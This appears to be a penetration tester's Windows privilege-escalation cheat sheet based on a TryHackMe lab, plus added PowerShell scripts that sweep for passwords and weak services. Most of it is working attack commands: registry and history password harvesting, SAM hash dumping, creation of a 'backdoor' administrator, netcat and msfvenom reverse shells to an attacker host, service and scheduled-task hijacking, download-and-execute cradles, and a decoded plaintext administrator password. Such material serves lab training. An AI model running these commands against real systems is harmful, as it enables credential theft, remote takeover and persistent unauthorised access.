Windows
Copy info from here: https://tryhackme.com/room/windowsprivesc20
Gathering Info
whoami /priv
net user
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
dir c:\
dir "c:\program files"
dir "c:\program files (x86)"
wmic service get name,startname
wmic service get name,pathname,startname | findstr "Program Files"
(wmic is deprecated and missing on recent Windows 11 builds; the same service data is available from PowerShell via Get-CimInstance Win32_Service.)
Find text in file
type C:\Windows\path\to\file\$FILE | findstr $STRING
Find passwords
reg query HKLM /f password /t REG_SZ /s
Harvesting Passwords from Usual Spots
You might find interesting files by looking at what was recently accessed: Start -> Run -> recent (this opens the Recent Items folder, %APPDATA%\Microsoft\Windows\Recent).

Powershell history
Examples
Only the current user's history is readable until you are an admin; from PowerShell use $env:USERPROFILE instead of %userprofile%.
Victim(cmd)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Saved Windows credentials
Examples
runas /savecred spawns the new process in a separate console window, so you need a GUI (or RDP) session to see the cmd.exe it opens. From a reverse shell, run a binary whose output you can see instead of cmd.exe (e.g. a reverse-shell executable, or cmd.exe /c with output redirected to a file).
Victim(cmd)
cmdkey /list
runas /savecred /user:$DOMAIN\$USERNAME cmd.exe
PuTTY sessions
Examples
Retrieve the saved proxy password stored in the PuTTY sessions under your profile. PuTTY does not store the SSH password itself, but the proxy credentials (ProxyUsername/ProxyPassword) are kept in cleartext in the registry and are frequently reused.
Victim(cmd)
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
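The checks above done in one sweep, as an added example (not from the TryHackMe room or this page): it walks every profile's PSReadline history, lists saved credentials with cmdkey, pulls PuTTY proxy credentials from the registry, and lists recently opened files. Only built-in cmdlets are used; the keyword list in $patterns and C:\Users as the profile root are assumptions you can adjust.

```powershell
# Added example: sweep the usual password spots in one pass. Built-in cmdlets only;
# needs PowerShell 3+. Other users' profile folders are only readable once you are
# an admin, so those hits appear after privilege escalation, not before.
$patterns = 'password', 'passwd', 'pwd', 'cred', 'secret', 'runas', 'ConvertTo-SecureString'  # assumed keyword list
$hits = New-Object System.Collections.ArrayList

function Add-Hit([string]$Source, [string]$Line) {
    [void]$hits.Add([pscustomobject]@{ Source = $Source; Line = $Line.Trim() })
}

# 1. PSReadline history of every profile, not just %userprofile%
Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue | ForEach-Object {
    $hist = Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
    if (Test-Path -LiteralPath $hist) {
        Select-String -LiteralPath $hist -Pattern $patterns -SimpleMatch -ErrorAction SilentlyContinue |
            ForEach-Object { Add-Hit "history:$($_.Path)" $_.Line }
    }
}

# 2. Credentials saved for runas /savecred (same data as cmdkey /list)
$saved = @(cmdkey /list 2>$null | Where-Object { $_ -match 'Target:|User:' })
if ($saved.Count) { Add-Hit 'cmdkey' ($saved -join ' | ') }

# 3. PuTTY sessions: ProxyPassword is stored in cleartext under HKCU
$putty = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
if (Test-Path $putty) {
    Get-ChildItem $putty | ForEach-Object {
        $s = Get-ItemProperty -LiteralPath $_.PSPath
        if ($s.ProxyPassword) {
            Add-Hit "putty:$($_.PSChildName)" ('host={0} user={1} proxyuser={2} proxypass={3}' -f $s.HostName, $s.UserName, $s.ProxyUsername, $s.ProxyPassword)
        }
    }
}

# 4. Recently opened files (what Start -> Run -> recent shows), newest first
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Recent" -Filter *.lnk -ErrorAction SilentlyContinue |
    Sort-Object LastWriteTime -Descending | Select-Object -First 15 |
    ForEach-Object { Add-Hit 'recent' $_.BaseName }

$hits | Format-Table -AutoSize -Wrap
```

Run it from a PowerShell prompt on the target; each row names the source so a history hit can be opened in full with the type command above.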
See hidden files
Examples

System and Sam
Download system and sam. This needs local admin; the download command below is the Evil-WinRM built-in, so run it from an Evil-WinRM session.
Examples
Tampering With Unprivileged Accounts
Kali(WinRM)
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
Dump hashes
Examples
Kali
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
Add User & Assign Group Memberships
Victim
net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f
(forceguest=0 switches the sharing model to "Classic" so network logons (SMB, WinRM) authenticate as the real account instead of being mapped to Guest; it only matters on non-domain-joined hosts.)
Enable RDP
Victim
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
If the firewall blocks 3389, the "Remote Desktop" firewall rule group must be enabled as well.
Add user to RDP Group
Examples
Add the user to the group that allows RDP logon. Note that "Remote Management Users" is the WinRM group, not the RDP one; RDP logon needs "Remote Desktop Users" (members of Administrators can RDP without it).
Victim(cmd)
net localgroup "Remote Desktop Users" $USER /add
net localgroup "Remote Management Users" $USER /add
Scheduled Tasks
Examples
Abusing Scheduled Tasks
Looking into scheduled tasks on the target system, you may find a task that has lost its binary, or one that runs a binary you can modify. Either way, the task runs your code as its principal (often SYSTEM) the next time it fires.
Scheduled tasks can be listed from the command line using the schtasks command without any options. To retrieve detailed information about a task, including the account it runs as ("Run As User") and the command it executes ("Task To Run"), query it by name:
Victim(cmd)
schtasks
Victim(cmd)
schtasks /query /tn $TASK /fo list /v
Check whether you can write to the task's binary:
Victim(cmd)
icacls c:\tasks\schtask.bat
Kali
nc -lvnp 4444
Victim
echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn $TASK
Note: /run only works if you have permission to start the task; otherwise wait for its next trigger ("Next Run Time" in the /query output).
Abusing Service Misconfigurations
Examples
Insecure Permissions on Service Executable
Get the flag on svcusr1's desktop
Victim(cmd)
sc qc WindowsScheduler
Victim(cmd)
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81
Use -f exe-service: a plain .exe started by the Service Control Manager is killed when it fails to report its status in time, while the exe-service wrapper keeps the SCM happy.
Victim(Powershell)
wget http://$KALI:81/rev-svc.exe -O rev-svc.exe
Once the payload is on the Windows host, replace the service executable with it. Since another user (svcusr1) executes the payload, grant Full Control to the Everyone group as well so that account can read and run it.
Victim(Powershell)
cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F
Kali
nc -lvp 4445
Restart the service to execute the payload; you'll get a reverse shell with svcusr1 privileges. If you lack permission to stop the service, the fallback is a reboot (if you hold SeShutdownPrivilege) or waiting for the next restart.
Note: PowerShell has sc as an alias for Set-Content, so you need to use sc.exe in order to control services from PowerShell.
Victim(cmd)
sc stop windowsscheduler
sc start windowsscheduler
OR
Victim(Powershell)
sc.exe stop windowsscheduler
sc.exe start windowsscheduler
Unquoted Service Paths
Examples
Check BINARY_PATH_NAME in the sc qc output. If the path is unquoted and contains spaces, Windows tries each space-delimited prefix as an executable before the real one (for C:\Dir\Some Program\svc.exe it tries C:\Dir\Some.exe first), so a writable directory along the path lets you plant a binary. Here the hijack point is C:\MyPrograms\Disk.exe.
Victim(cmd)
sc qc "disk sorter enterprise"
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Kali
nc -lvp 4446
Victim(cmd)
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
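The three file-system checks from the scheduled-task section and the two service sections above (missing or writable task binaries, writable service executables, unquoted service paths with a writable hijack directory) rolled into one script, as an added example that is not from the TryHackMe room or this page. It uses only built-in cmdlets; the write-permission mask and the argument-stripping heuristic for unquoted paths are my own choices and are commented as such.

```powershell
# Added example (not from the TryHackMe room or this page): one pass over the
# file-system misconfigurations described above, so you do not have to icacls
# each path by hand:
#   1. scheduled-task actions whose binary is missing (with a writable parent dir)
#      or writable by you
#   2. service binaries writable by you (the WService.exe case)
#   3. unquoted service paths with a writable directory before a space
# Assumes PowerShell 5.1+ on Windows 8/2012 or later (Get-ScheduledTask). Deny ACEs
# are not evaluated, so confirm every hit with icacls before acting on it.

$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

# Assumed "can replace it" mask: WriteData/CreateFiles (0x2), WRITE_DAC (0x40000),
# WRITE_OWNER (0x80000), GENERIC_ALL (0x10000000), GENERIC_WRITE (0x40000000).
# AppendData alone is deliberately excluded: on C:\ it only allows creating folders.
$writeMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Test-Writable([string]$Path) {
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($mySids -contains $sid -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

function Find-WeakTask {
    Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {
            if (-not $a.Execute) { continue }                      # COM-handler/mail actions have no binary
            $exe = [Environment]::ExpandEnvironmentVariables($a.Execute).Trim('"')
            if (-not [IO.Path]::IsPathRooted($exe)) { continue }   # bare name resolved via PATH; skip
            $why = $null
            if (-not (Test-Path -LiteralPath $exe)) {
                if (Test-Writable (Split-Path $exe)) { $why = 'binary missing, parent dir writable' }
            } elseif (Test-Writable $exe) { $why = 'binary writable' }
            if ($why) {
                [pscustomobject]@{ Type = 'Task'; Name = "$($task.TaskPath)$($task.TaskName)"; RunAs = $task.Principal.UserId; Path = $exe; Finding = $why }
            }
        }
    }
}

function Find-WeakService {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $raw = $svc.PathName
        if (-not $raw) { return }
        if ($raw.StartsWith('"')) {
            $end = $raw.IndexOf('"', 1)
            if ($end -lt 1) { return }
            $exe = $raw.Substring(1, $end - 1)                     # quoted: take what's inside the quotes
        } else {
            $exe = ($raw -split ' -| /')[0]                        # unquoted: drop " -arg" / " /arg" switches (heuristic)
            if ($exe -match ' ') {
                # Windows tries every space-delimited prefix as "<prefix>.exe" before the
                # real binary, e.g. C:\MyPrograms\Disk.exe before C:\MyPrograms\Disk Sorter...
                $parts = $exe -split ' '
                for ($i = 1; $i -lt $parts.Count; $i++) {
                    $prefix = $parts[0..($i - 1)] -join ' '
                    $dir = Split-Path $prefix
                    if ($dir -and (Test-Writable $dir)) {
                        [pscustomobject]@{ Type = 'Service (unquoted)'; Name = $svc.Name; RunAs = $svc.StartName; Path = "$prefix.exe"; Finding = "dir $dir writable" }
                    }
                }
            }
        }
        if ((Test-Path -LiteralPath $exe) -and (Test-Writable $exe)) {
            [pscustomobject]@{ Type = 'Service'; Name = $svc.Name; RunAs = $svc.StartName; Path = $exe; Finding = 'binary writable' }
        }
    }
}

@(Find-WeakTask) + @(Find-WeakService) | Format-Table -AutoSize -Wrap
```

The RunAs column is what decides whether a hit is worth anything: a writable binary for a task or service that runs as your own account gains nothing, while SYSTEM or another user (svcusr1 above) is the target.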
Insecure Service Permissions
Examples
Here the service's own DACL (not the file's) is the problem: if your user, or a group you are in such as Everyone or BUILTIN\Users, holds SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS, you can repoint binPath at your payload and have it start as LocalSystem. accesschk -c queries service objects; -q suppresses the banner and -l lists the full ACL.
Victim(cmd)
cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81
Victim(Powershell)
wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe
Kali
nc -lvp 4447
The spaces after binPath= and obj= are required by sc.
Victim(Powershell)
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService
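The accesschk check above for every service at once, using only built-in tooling, as an added example (not from the TryHackMe room or this page). sc.exe sdshow prints a service's security descriptor as SDDL; the .NET RawSecurityDescriptor class parses it, and each allow ACE is matched against the current token's user and group SIDs. The right constants are from winsvc.h; grouping them into a "change config" mask and a "rewrite DACL" mask is my own choice.

```powershell
# Added example (not from the TryHackMe room or this page): list services whose
# DACL lets the current user change their configuration or rewrite the DACL.
# Requires PowerShell 3+ and READ_CONTROL on each service (the default grants it
# to interactive users; services you cannot query are skipped silently).

# Service-specific rights (winsvc.h) plus the standard/generic rights that imply them.
$SERVICE_CHANGE_CONFIG = 0x00002   # what sc.exe config binPath= needs
$SERVICE_START         = 0x00010
$SERVICE_STOP          = 0x00020
$WRITE_DAC             = 0x40000   # lets you grant yourself anything else
$WRITE_OWNER           = 0x80000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000
$changeMask = $SERVICE_CHANGE_CONFIG -bor $GENERIC_WRITE -bor $GENERIC_ALL
$daclMask   = $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL

# Token SIDs: user plus every group, which already includes Everyone (S-1-1-0),
# Authenticated Users (S-1-5-11) and INTERACTIVE. Caveat: if you are a member of
# Administrators with a filtered (non-elevated) token, Administrators ACEs match
# here but are deny-only until you elevate.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

function Get-ServiceDacl([string]$Name) {
    $out  = & sc.exe sdshow $Name 2>$null
    $sddl = @($out | Where-Object { $_ -match '^\s*D:' })
    if (-not $sddl.Count) { return $null }                       # access denied or no such service
    New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl[0].Trim())
}

function Find-WeakServiceDacl {
    Get-Service | ForEach-Object {
        $svc = $_
        $sd = Get-ServiceDacl $svc.Name
        if (-not $sd -or -not $sd.DiscretionaryAcl) { return }
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            $sid = $ace.SecurityIdentifier.Value
            if ($mySids -notcontains $sid) { continue }
            $canChange = ($ace.AccessMask -band $changeMask) -ne 0
            $canDacl   = ($ace.AccessMask -band $daclMask) -ne 0
            if (-not ($canChange -or $canDacl)) { continue }
            try { $who = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { $who = $sid }
            [pscustomobject]@{
                Service      = $svc.Name
                Principal    = $who
                AccessMask   = '0x{0:X}' -f $ace.AccessMask
                ChangeConfig = $canChange
                WriteDacl    = $canDacl
                StartStop    = (($ace.AccessMask -band ($SERVICE_START -bor $SERVICE_STOP)) -ne 0)
            }
        }
    }
}

Find-WeakServiceDacl | Format-Table -AutoSize
```

A row with ChangeConfig = True and StartStop = True is the THMService case above: repoint binPath, then stop and start the service yourself. ChangeConfig without StartStop still works, but you have to wait for a reboot or another restart of the service.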
Abusing dangerous privileges
Examples

RogueWinRM abuses SeImpersonatePrivilege (check with whoami /priv). It listens on the WinRM port (5985) and waits for the BITS service to connect as SYSTEM, so it only works when the real WinRM service is not already running. "Victim(Browser)" means the command is run through the lab's web shell.
Kali
nc -lvp 4442
Victim(Browser)
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"
Bypassing UAC
Examples:
Bypassing Applocker
Examples:
Load PowerUp.ps1 into memory.
Kali
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81
Add the following line at the bottom of PowerUp.ps1 so it invokes all checks automatically once downloaded:
PowerUp.ps1
Invoke-AllChecks
Victim(powershell)
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')

Kali
echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d
Kali
xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T
Privilege Escalation
Automated Enumeration Tools
WinPeas
Windows Exploit Suggester
SharpHound
git clone https://github.com/BloodHoundAD/BloodHound.git
Powerview
Juicy Potato
Examples
Download Juicy Potato to your attack machine
Upload Juicy Potato to the target (ex: via FTP, SMB, HTTP, etc.)
Create a reverse shell and upload it to the target (ex: via FTP, SMB, HTTP, etc.), then use Juicy Potato to execute your reverse shell
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
JuicyPotato.exe -l 5050 -p C:\path\to\reverse-shell.exe -t *
Requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege and only works up to Windows 10 1803 / Server 2016; on newer builds use PrintSpoofer or RoguePotato instead. If the default CLSID fails, pass one that matches the target OS with -c {CLSID}.
PowerUp.ps1
Examples
Setup
Kali
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python2 -m SimpleHTTPServer 81
Victim(cmd)
certutil -urlcache -f http://10.10.228.214:81/PowerUp.ps1 PowerUp.ps1
Victim(powershell)
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
OR
Victim(powershell)
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')
Windows Exploit Suggester
Examples
Setup
Run systeminfo on the target and paste the output into a file called systeminfo.txt on Kali.
Victim
systeminfo
Kali
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt
--update prints the name of the (date-stamped) bulletin database it downloaded; use that filename. Note that the upstream script is written for Python 2 and the Microsoft bulletin data it relies on stopped in 2017, so for anything newer than that use wesng (https://github.com/bitsadmin/wesng), which takes the same systeminfo.txt input.
WinPeas
Examples
Setup
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 82
Victim
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:82/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exe
SharpHound
Examples
Add this line to SharpHound.ps1 before transferring it so I could run the command right away:

Victim
powershell -ep bypass
.\SharpHound.ps1
Kali
apt-get install bloodhound
neo4j console
bloodhound --no-sandbox
Find all Domain Admins


List all Kerberoastable accounts


Powerview
Examples
Victim
Run the following to be able to use PowerView commands.
powershell -ep bypass
. .\Downloads\PowerView.ps1
Enumerate the domain users.
Get-NetUser | select cn
Enumerate the domain groups.
Get-NetGroup -GroupName *admin*
Find shared folders.
Invoke-ShareFinder
Get operating systems on the network.
Get-NetComputer -fulldata | select operatingsystem